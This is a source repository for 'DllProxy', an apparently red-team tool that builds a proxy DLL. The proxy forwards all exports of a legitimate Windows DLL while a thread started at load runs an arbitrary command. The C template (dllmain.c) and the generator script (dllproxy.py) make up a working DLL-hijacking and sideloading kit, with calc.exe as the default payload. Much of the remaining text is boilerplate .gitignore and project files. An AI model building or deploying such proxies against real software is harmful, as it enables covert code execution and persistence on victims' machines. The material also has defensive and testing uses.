├── .gitignore
├── DllProxy.sln
├── DllProxy
├── .gitignore
├── DllProxy.filters
├── Dllproxy.vcxproj
├── dllmain.c
└── dllmain.h
├── NormalDLL.dll
├── README.md
├── dllproxy.py
├── requirements.txt
└── templates.py
/.gitignore:
--------------------------------------------------------------------------------
1 | ## Ignore Visual Studio temporary files, build results, and
2 | ## files generated by popular Visual Studio add-ons.
3 | ##
4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
5 |
6 | # User-specific files
7 | *.rsuser
8 | *.suo
9 | *.user
10 | *.userosscache
11 | *.sln.docstates
12 |
13 | # User-specific files (MonoDevelop/Xamarin Studio)
14 | *.userprefs
15 |
16 | # Mono auto generated files
17 | mono_crash.*
18 |
19 | # Build results
20 | [Dd]ebug/
21 | [Dd]ebugPublic/
22 | [Rr]elease/
23 | [Rr]eleases/
24 | x64/
25 | x86/
26 | [Ww][Ii][Nn]32/
27 | [Aa][Rr][Mm]/
28 | [Aa][Rr][Mm]64/
29 | bld/
30 | [Bb]in/
31 | [Oo]bj/
32 | [Ll]og/
33 | [Ll]ogs/
34 |
35 | # Visual Studio 2015/2017 cache/options directory
36 | .vs/
37 | # Uncomment if you have tasks that create the project's static files in wwwroot
38 | #wwwroot/
39 |
40 | # Visual Studio 2017 auto generated files
41 | Generated\ Files/
42 |
43 | # MSTest test Results
44 | [Tt]est[Rr]esult*/
45 | [Bb]uild[Ll]og.*
46 |
47 | # NUnit
48 | *.VisualState.xml
49 | TestResult.xml
50 | nunit-*.xml
51 |
52 | # Build Results of an ATL Project
53 | [Dd]ebugPS/
54 | [Rr]eleasePS/
55 | dlldata.c
56 |
57 | # Benchmark Results
58 | BenchmarkDotNet.Artifacts/
59 |
60 | # .NET Core
61 | project.lock.json
62 | project.fragment.lock.json
63 | artifacts/
64 |
65 | # ASP.NET Scaffolding
66 | ScaffoldingReadMe.txt
67 |
68 | # StyleCop
69 | StyleCopReport.xml
70 |
71 | # Files built by Visual Studio
72 | *_i.c
73 | *_p.c
74 | *_h.h
75 | *.ilk
76 | *.meta
77 | *.obj
78 | *.iobj
79 | *.pch
80 | *.pdb
81 | *.ipdb
82 | *.pgc
83 | *.pgd
84 | *.rsp
85 | *.sbr
86 | *.tlb
87 | *.tli
88 | *.tlh
89 | *.tmp
90 | *.tmp_proj
91 | *_wpftmp.csproj
92 | *.log
93 | *.vspscc
94 | *.vssscc
95 | .builds
96 | *.pidb
97 | *.svclog
98 | *.scc
99 |
100 | # Chutzpah Test files
101 | _Chutzpah*
102 |
103 | # Visual C++ cache files
104 | ipch/
105 | *.aps
106 | *.ncb
107 | *.opendb
108 | *.opensdf
109 | *.sdf
110 | *.cachefile
111 | *.VC.db
112 | *.VC.VC.opendb
113 |
114 | # Visual Studio profiler
115 | *.psess
116 | *.vsp
117 | *.vspx
118 | *.sap
119 |
120 | # Visual Studio Trace Files
121 | *.e2e
122 |
123 | # TFS 2012 Local Workspace
124 | $tf/
125 |
126 | # Guidance Automation Toolkit
127 | *.gpState
128 |
129 | # ReSharper is a .NET coding add-in
130 | _ReSharper*/
131 | *.[Rr]e[Ss]harper
132 | *.DotSettings.user
133 |
134 | # TeamCity is a build add-in
135 | _TeamCity*
136 |
137 | # DotCover is a Code Coverage Tool
138 | *.dotCover
139 |
140 | # AxoCover is a Code Coverage Tool
141 | .axoCover/*
142 | !.axoCover/settings.json
143 |
144 | # Coverlet is a free, cross platform Code Coverage Tool
145 | coverage*.json
146 | coverage*.xml
147 | coverage*.info
148 |
149 | # Visual Studio code coverage results
150 | *.coverage
151 | *.coveragexml
152 |
153 | # NCrunch
154 | _NCrunch_*
155 | .*crunch*.local.xml
156 | nCrunchTemp_*
157 |
158 | # MightyMoose
159 | *.mm.*
160 | AutoTest.Net/
161 |
162 | # Web workbench (sass)
163 | .sass-cache/
164 |
165 | # Installshield output folder
166 | [Ee]xpress/
167 |
168 | # DocProject is a documentation generator add-in
169 | DocProject/buildhelp/
170 | DocProject/Help/*.HxT
171 | DocProject/Help/*.HxC
172 | DocProject/Help/*.hhc
173 | DocProject/Help/*.hhk
174 | DocProject/Help/*.hhp
175 | DocProject/Help/Html2
176 | DocProject/Help/html
177 |
178 | # Click-Once directory
179 | publish/
180 |
181 | # Publish Web Output
182 | *.[Pp]ublish.xml
183 | *.azurePubxml
184 | # Note: Comment the next line if you want to checkin your web deploy settings,
185 | # but database connection strings (with potential passwords) will be unencrypted
186 | *.pubxml
187 | *.publishproj
188 |
189 | # Microsoft Azure Web App publish settings. Comment the next line if you want to
190 | # checkin your Azure Web App publish settings, but sensitive information contained
191 | # in these scripts will be unencrypted
192 | PublishScripts/
193 |
194 | # NuGet Packages
195 | *.nupkg
196 | # NuGet Symbol Packages
197 | *.snupkg
198 | # The packages folder can be ignored because of Package Restore
199 | **/[Pp]ackages/*
200 | # except build/, which is used as an MSBuild target.
201 | !**/[Pp]ackages/build/
202 | # Uncomment if necessary however generally it will be regenerated when needed
203 | #!**/[Pp]ackages/repositories.config
204 | # NuGet v3's project.json files produces more ignorable files
205 | *.nuget.props
206 | *.nuget.targets
207 |
208 | # Microsoft Azure Build Output
209 | csx/
210 | *.build.csdef
211 |
212 | # Microsoft Azure Emulator
213 | ecf/
214 | rcf/
215 |
216 | # Windows Store app package directories and files
217 | AppPackages/
218 | BundleArtifacts/
219 | Package.StoreAssociation.xml
220 | _pkginfo.txt
221 | *.appx
222 | *.appxbundle
223 | *.appxupload
224 |
225 | # Visual Studio cache files
226 | # files ending in .cache can be ignored
227 | *.[Cc]ache
228 | # but keep track of directories ending in .cache
229 | !?*.[Cc]ache/
230 |
231 | # Others
232 | ClientBin/
233 | ~$*
234 | *~
235 | *.dbmdl
236 | *.dbproj.schemaview
237 | *.jfm
238 | *.pfx
239 | *.publishsettings
240 | orleans.codegen.cs
241 |
242 | # Including strong name files can present a security risk
243 | # (https://github.com/github/gitignore/pull/2483#issue-259490424)
244 | #*.snk
245 |
246 | # Since there are multiple workflows, uncomment next line to ignore bower_components
247 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
248 | #bower_components/
249 |
250 | # RIA/Silverlight projects
251 | Generated_Code/
252 |
253 | # Backup & report files from converting an old project file
254 | # to a newer Visual Studio version. Backup files are not needed,
255 | # because we have git ;-)
256 | _UpgradeReport_Files/
257 | Backup*/
258 | UpgradeLog*.XML
259 | UpgradeLog*.htm
260 | ServiceFabricBackup/
261 | *.rptproj.bak
262 |
263 | # SQL Server files
264 | *.mdf
265 | *.ldf
266 | *.ndf
267 |
268 | # Business Intelligence projects
269 | *.rdl.data
270 | *.bim.layout
271 | *.bim_*.settings
272 | *.rptproj.rsuser
273 | *- [Bb]ackup.rdl
274 | *- [Bb]ackup ([0-9]).rdl
275 | *- [Bb]ackup ([0-9][0-9]).rdl
276 |
277 | # Microsoft Fakes
278 | FakesAssemblies/
279 |
280 | # GhostDoc plugin setting file
281 | *.GhostDoc.xml
282 |
283 | # Node.js Tools for Visual Studio
284 | .ntvs_analysis.dat
285 | node_modules/
286 |
287 | # Visual Studio 6 build log
288 | *.plg
289 |
290 | # Visual Studio 6 workspace options file
291 | *.opt
292 |
293 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
294 | *.vbw
295 |
296 | # Visual Studio LightSwitch build output
297 | **/*.HTMLClient/GeneratedArtifacts
298 | **/*.DesktopClient/GeneratedArtifacts
299 | **/*.DesktopClient/ModelManifest.xml
300 | **/*.Server/GeneratedArtifacts
301 | **/*.Server/ModelManifest.xml
302 | _Pvt_Extensions
303 |
304 | # Paket dependency manager
305 | .paket/paket.exe
306 | paket-files/
307 |
308 | # FAKE - F# Make
309 | .fake/
310 |
311 | # CodeRush personal settings
312 | .cr/personal
313 |
314 | # Python Tools for Visual Studio (PTVS)
315 | __pycache__/
316 | *.pyc
317 |
318 | # Cake - Uncomment if you are using it
319 | # tools/**
320 | # !tools/packages.config
321 |
322 | # Tabs Studio
323 | *.tss
324 |
325 | # Telerik's JustMock configuration file
326 | *.jmconfig
327 |
328 | # BizTalk build output
329 | *.btp.cs
330 | *.btm.cs
331 | *.odx.cs
332 | *.xsd.cs
333 |
334 | # OpenCover UI analysis results
335 | OpenCover/
336 |
337 | # Azure Stream Analytics local run output
338 | ASALocalRun/
339 |
340 | # MSBuild Binary and Structured Log
341 | *.binlog
342 |
343 | # NVidia Nsight GPU debugger configuration file
344 | *.nvuser
345 |
346 | # MFractors (Xamarin productivity tool) working folder
347 | .mfractor/
348 |
349 | # Local History for Visual Studio
350 | .localhistory/
351 |
352 | # BeatPulse healthcheck temp database
353 | healthchecksdb
354 |
355 | # Backup folder for Package Reference Convert tool in Visual Studio 2017
356 | MigrationBackup/
357 |
358 | # Ionide (cross platform F# VS Code tools) working folder
359 | .ionide/
360 |
361 | # Fody - auto-generated XML schema
362 | FodyWeavers.xsd
363 |
364 | # Byte-compiled / optimized / DLL files
365 | __pycache__/
366 | *.py[cod]
367 | *$py.class
368 |
369 | # C extensions
370 | *.so
371 |
372 | # Distribution / packaging
373 | .Python
374 | build/
375 | develop-eggs/
376 | dist/
377 | downloads/
378 | eggs/
379 | .eggs/
380 | lib/
381 | lib64/
382 | parts/
383 | sdist/
384 | var/
385 | wheels/
386 | share/python-wheels/
387 | *.egg-info/
388 | .installed.cfg
389 | *.egg
390 | MANIFEST
391 |
392 | # PyInstaller
393 | # Usually these files are written by a python script from a template
394 | # before PyInstaller builds the exe, so as to inject date/other infos into it.
395 | *.manifest
396 | *.spec
397 |
398 | # Installer logs
399 | pip-log.txt
400 | pip-delete-this-directory.txt
401 |
402 | # Unit test / coverage reports
403 | htmlcov/
404 | .tox/
405 | .nox/
406 | .coverage
407 | .coverage.*
408 | .cache
409 | nosetests.xml
410 | coverage.xml
411 | *.cover
412 | *.py,cover
413 | .hypothesis/
414 | .pytest_cache/
415 | cover/
416 |
417 | # Translations
418 | *.mo
419 | *.pot
420 |
421 | # Django stuff:
422 | *.log
423 | local_settings.py
424 | db.sqlite3
425 | db.sqlite3-journal
426 |
427 | # Flask stuff:
428 | instance/
429 | .webassets-cache
430 |
431 | # Scrapy stuff:
432 | .scrapy
433 |
434 | # Sphinx documentation
435 | docs/_build/
436 |
437 | # PyBuilder
438 | .pybuilder/
439 | target/
440 |
441 | # Jupyter Notebook
442 | .ipynb_checkpoints
443 |
444 | # IPython
445 | profile_default/
446 | ipython_config.py
447 |
448 | # pyenv
449 | # For a library or package, you might want to ignore these files since the code is
450 | # intended to run in multiple environments; otherwise, check them in:
451 | # .python-version
452 |
453 | # pipenv
454 | # According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control.
455 | # However, in case of collaboration, if having platform-specific dependencies or dependencies
456 | # having no cross-platform support, pipenv may install dependencies that don't work, or not
457 | # install all needed dependencies.
458 | #Pipfile.lock
459 |
460 | # PEP 582; used by e.g. github.com/David-OConnor/pyflow
461 | __pypackages__/
462 |
463 | # Celery stuff
464 | celerybeat-schedule
465 | celerybeat.pid
466 |
467 | # SageMath parsed files
468 | *.sage.py
469 |
470 | # Environments
471 | .env
472 | .venv
473 | env/
474 | venv/
475 | ENV/
476 | env.bak/
477 | venv.bak/
478 |
479 | # Spyder project settings
480 | .spyderproject
481 | .spyproject
482 |
483 | # Rope project settings
484 | .ropeproject
485 |
486 | # mkdocs documentation
487 | /site
488 |
489 | # mypy
490 | .mypy_cache/
491 | .dmypy.json
492 | dmypy.json
493 |
494 | # Pyre type checker
495 | .pyre/
496 |
497 | # pytype static type analyzer
498 | .pytype/
499 |
500 | # Cython debug symbols
501 | cython_debug/
--------------------------------------------------------------------------------
/DllProxy.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.30621.155
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DllProxy", "DllProxy\DllProxy.vcxproj", "{6991D7EB-4A6C-4251-86A5-039A008B3C68}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|x64 = Debug|x64
11 | Debug|x86 = Debug|x86
12 | Release|x64 = Release|x64
13 | Release|x86 = Release|x86
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {6991D7EB-4A6C-4251-86A5-039A008B3C68}.Debug|x64.ActiveCfg = Debug|x64
17 | {6991D7EB-4A6C-4251-86A5-039A008B3C68}.Debug|x64.Build.0 = Debug|x64
18 | {6991D7EB-4A6C-4251-86A5-039A008B3C68}.Debug|x86.ActiveCfg = Debug|Win32
19 | {6991D7EB-4A6C-4251-86A5-039A008B3C68}.Debug|x86.Build.0 = Debug|Win32
20 | {6991D7EB-4A6C-4251-86A5-039A008B3C68}.Release|x64.ActiveCfg = Release|x64
21 | {6991D7EB-4A6C-4251-86A5-039A008B3C68}.Release|x64.Build.0 = Release|x64
22 | {6991D7EB-4A6C-4251-86A5-039A008B3C68}.Release|x86.ActiveCfg = Release|Win32
23 | {6991D7EB-4A6C-4251-86A5-039A008B3C68}.Release|x86.Build.0 = Release|Win32
24 | EndGlobalSection
25 | GlobalSection(SolutionProperties) = preSolution
26 | HideSolutionNode = FALSE
27 | EndGlobalSection
28 | GlobalSection(ExtensibilityGlobals) = postSolution
29 | SolutionGuid = {8A19F473-B984-4265-87B7-A0B779380C47}
30 | EndGlobalSection
31 | EndGlobal
32 |
--------------------------------------------------------------------------------
/DllProxy/.gitignore:
--------------------------------------------------------------------------------
1 | user.c
2 | user.h
3 | library.def
--------------------------------------------------------------------------------
/DllProxy/DllProxy.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 | Source Files
23 |
24 |
25 |
26 |
27 | Source Files
28 |
29 |
30 |
31 |
32 | Header Files
33 |
34 |
35 | Header Files
36 |
37 |
38 |
--------------------------------------------------------------------------------
/DllProxy/Dllproxy.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | 16.0
23 | Win32Proj
24 | {6991d7eb-4a6c-4251-86a5-039a008b3c68}
25 | DllProxy
26 | 10.0.19041.0
27 |
28 |
29 |
30 | DynamicLibrary
31 | true
32 | v143
33 | Unicode
34 |
35 |
36 | DynamicLibrary
37 | false
38 | v143
39 | true
40 | Unicode
41 |
42 |
43 | DynamicLibrary
44 | true
45 | v143
46 | Unicode
47 |
48 |
49 | DynamicLibrary
50 | false
51 | v143
52 | true
53 | Unicode
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 | true
75 | DllProxy
76 |
77 |
78 | false
79 | DllProxy
80 |
81 |
82 | true
83 | DllProxy
84 |
85 |
86 | false
87 | DllProxy
88 | $(VC_ExecutablePath_x64);$(CommonExecutablePath)
89 |
90 |
91 |
92 | Level3
93 | true
94 | WIN32;_DEBUG;DllProxy_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
95 | true
96 | NotUsing
97 | pch.h
98 |
99 |
100 | Windows
101 | true
102 | false
103 |
104 |
105 |
106 |
107 | Level3
108 | true
109 | true
110 | true
111 | WIN32;NDEBUG;DllProxy_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
112 | true
113 | NotUsing
114 | pch.h
115 |
116 |
117 | Windows
118 | true
119 | true
120 | true
121 | false
122 |
123 |
124 |
125 |
126 | Level3
127 | true
128 | _DEBUG;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
129 | true
130 | NotUsing
131 | pch.h
132 | MultiThreadedDLL
133 |
134 |
135 | Windows
136 | true
137 | false
138 |
139 |
140 |
141 |
142 |
143 |
144 | Level3
145 | true
146 | true
147 | true
148 | NDEBUG;DllProxy_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
149 | true
150 | NotUsing
151 |
152 |
153 |
154 |
155 |
156 | Windows
157 | false
158 | true
159 | true
160 | false
161 |
162 |
163 | $(OutDir)$(TargetName)$(TargetExt)
164 |
165 |
166 |
167 |
168 |
169 |
170 |
171 |
172 |
173 |
174 |
175 |
--------------------------------------------------------------------------------
/DllProxy/dllmain.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 |
5 | #include "dllmain.h"
6 |
7 | #define _CRT_SECURE_NO_DEPRECATE
8 | #pragma warning (disable : 4996)
9 |
10 |
11 | DWORD WINAPI DoMagic(LPVOID lpParameter)
12 | {
13 | system(MALICIOUS_CMD);
14 | return 0;
15 | }
16 |
17 |
18 | int DllMain( void* hModule, int ul_reason_for_call, void* lpReserved)
19 | {
20 |
21 | if (ul_reason_for_call == 1) {
22 | HANDLE threadHandle = CreateThread(NULL, 0, DoMagic, NULL, 0, NULL);
23 | CloseHandle(threadHandle);
24 | }
25 |
26 | return 1;
27 | }
--------------------------------------------------------------------------------
/NormalDLL.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Iansus/DllProxy/22602270ad62c004c4a6e80b09acf0aacbc8258f/NormalDLL.dll
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # DllProxy
2 |
3 | Proxy your dll exports and add some spicy content at the same time!
4 | New version now relies on forwarded exports rather than runtime library load, heavily inspired from [SharpDllProxy](https://github.com/Flangvik/SharpDllProxy)
5 |
6 | # Install
7 |
8 | ```batch
9 | > python3 -m virtualenv venv
10 | > venv\scripts\activate
11 | > pip3 install -r requirements.txt
12 | ```
13 |
14 |
15 | # Use
16 |
17 | ```batch
18 | > rundll32.exe NormalDLL.dll,test
19 | > rundll32.exe NormalDLL.dll,#2
20 |
21 | > python3 dllproxy.py -m calc.exe NormalDLL.dll
22 |
23 | > rundll32.exe dist\NormalDLL.dll,test
24 | > rundll32.exe dist\NormalDLL.dll,#2
25 | ```
--------------------------------------------------------------------------------
/dllproxy.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python3
2 |
3 | import argparse
4 | import logging
5 | import os
6 | import pereader
7 | import random
8 | import shutil
9 | import templates
10 |
11 | # Logging config
12 | logging.basicConfig(format = '\r[%(asctime)s] %(name)-20s %(levelname)-9s %(message)s')
13 | logger = logging.getLogger('')
14 |
15 | def randstr(n):
16 | charset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
17 | return ''.join([random.choice(list(charset)) for i in range(n)])
18 |
19 |
20 | def genVSProject(newName, origName, maliciousCmd):
21 |
22 | # rename original DLL to "orig" name
23 | orig_dll = pereader.PE(origName)
24 | newName = newName[:-4]
25 | dll_petype = orig_dll.OPTIONAL_HEADER.Magic
26 | bitness = 64 if dll_petype == pereader.NT_OPTIONAL_HDR64_MAGIC else 32
27 | logger.info('input DLL is %d-bits' % bitness)
28 |
29 | PRAGMA_COMMENTS = {}
30 | for export in orig_dll.directory_entry_export.symbols.symbols:
31 | if export.name == '':
32 | while export.name == '' or export.name in PRAGMA_COMMENTS.keys():
33 | export.name = randstr(8)
34 | export.origname = f'#{export.ordinal}'
35 |
36 | else:
37 | export.origname = export.name
38 |
39 | PRAGMA_COMMENTS[export.name] = f'#pragma comment(linker, "/export:{export.name}={newName}.{export.origname},@{export.ordinal}")'
40 |
41 |
42 | with open('DllProxy\\dllmain.h', 'w') as hFile:
43 | hFile.write(templates.DLLMAIN_H % {'MALICIOUS_CMD': maliciousCmd, 'PRAGMA_COMMENTS': '\n'.join(PRAGMA_COMMENTS.values())})
44 |
45 | return bitness
46 |
47 |
48 | if __name__ == '__main__':
49 |
50 | # args definition
51 | ap = argparse.ArgumentParser()
52 | ap.add_argument('--malicious-cmd', '-m', dest='malicious_cmd', required=False, default='C:\\Windows\\System32\\calc.exe')
53 | ap.add_argument('--verbose', '-v', action='store_true', default=False)
54 | ap.add_argument('DLL')
55 | args = ap.parse_args()
56 |
57 | # handle args
58 | # verbosity
59 | logger.setLevel(logging.DEBUG if args.verbose else logging.INFO)
60 | logger.info('welcome to DLLProxy!')
61 |
62 |
63 | origDll = args.DLL
64 | newDll = 'p-' + os.path.basename(origDll)
65 |
66 | malicious_cmd = args.malicious_cmd.replace('\\', '\\\\')
67 | malicious_cmd = malicious_cmd.replace('"', '\"')
68 | bitness = genVSProject(newDll, origDll, malicious_cmd)
69 | platform = 'x64' if bitness==64 else 'x86'
70 |
71 | WARNING = f'Open solution file within Visual Studio and build the solution:\n'
72 | WARNING+= f' * Configuration: Release\n'
73 | WARNING+= f' * Platform: {platform}\n\n'
74 | WARNING+= f'Press [ENTER] after successful build\n'
75 | input(WARNING)
76 |
77 | OUTPUT_DIR = 'dist'
78 | VS_BUILD_DIR = 'Release' if bitness==32 else os.path.join('x64','Release')
79 | VS_DLLNAME = 'DllProxy.dll'
80 |
81 | if not os.path.isdir(OUTPUT_DIR):
82 | os.mkdir(OUTPUT_DIR)
83 |
84 |
85 | built_proxy_dll = os.path.join(VS_BUILD_DIR, VS_DLLNAME)
86 | dist_proxy_dll = os.path.join(OUTPUT_DIR, origDll)
87 | dist_proxied_dll = os.path.join(OUTPUT_DIR, newDll)
88 |
89 | shutil.copy(origDll, dist_proxied_dll)
90 | shutil.copy(built_proxy_dll, dist_proxy_dll)
--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
1 | pereader
--------------------------------------------------------------------------------
/templates.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python3
2 |
3 | # DLLMAIN.h
4 | DLLMAIN_H = '''#ifndef DLLMAIN_H
5 | #define DLLMAIN_H
6 |
7 | #define MALICIOUS_CMD "%(MALICIOUS_CMD)s"
8 | %(PRAGMA_COMMENTS)s
9 |
10 | #endif'''
--------------------------------------------------------------------------------